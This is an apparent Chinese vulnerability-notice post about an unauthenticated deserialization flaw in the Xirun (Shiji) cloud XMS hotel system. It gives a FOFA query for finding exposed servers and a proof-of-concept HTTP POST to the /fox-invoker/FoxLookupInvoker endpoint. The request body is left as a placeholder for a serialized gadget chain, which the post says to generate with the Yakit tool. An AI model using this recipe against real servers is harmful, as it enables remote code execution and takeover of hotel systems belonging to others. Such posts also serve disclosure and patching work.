西软云XMS反序列化漏洞

本文最后更新于 2024年8月27日上午

西软云XMS反序列化漏洞

西软云XMS /fox-invoker/FoxLookupInvoker接口处存在反序列化漏洞，未经身份认证的攻击者可利用此漏洞执行任意代码，获取服务器权限。

fofa

1	`app="shiji-西软云XMS"`

poc

POST /fox-invoker/FoxLookupInvoker/?return-exception=true HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
Connection: close
 
{{hexdec(cb18x的序列化链)}

使用yakit 生成payload
c5fe271fed6a284b93b64e1023b2b581

e79d4907bddf12878c085d3146d856bc

漏洞知识库

西软云XMS-futurehotel-query接口存在XXE漏洞上一篇

资管云comfileup.php前台文件上传漏洞(XVE-2024-18154) 下一篇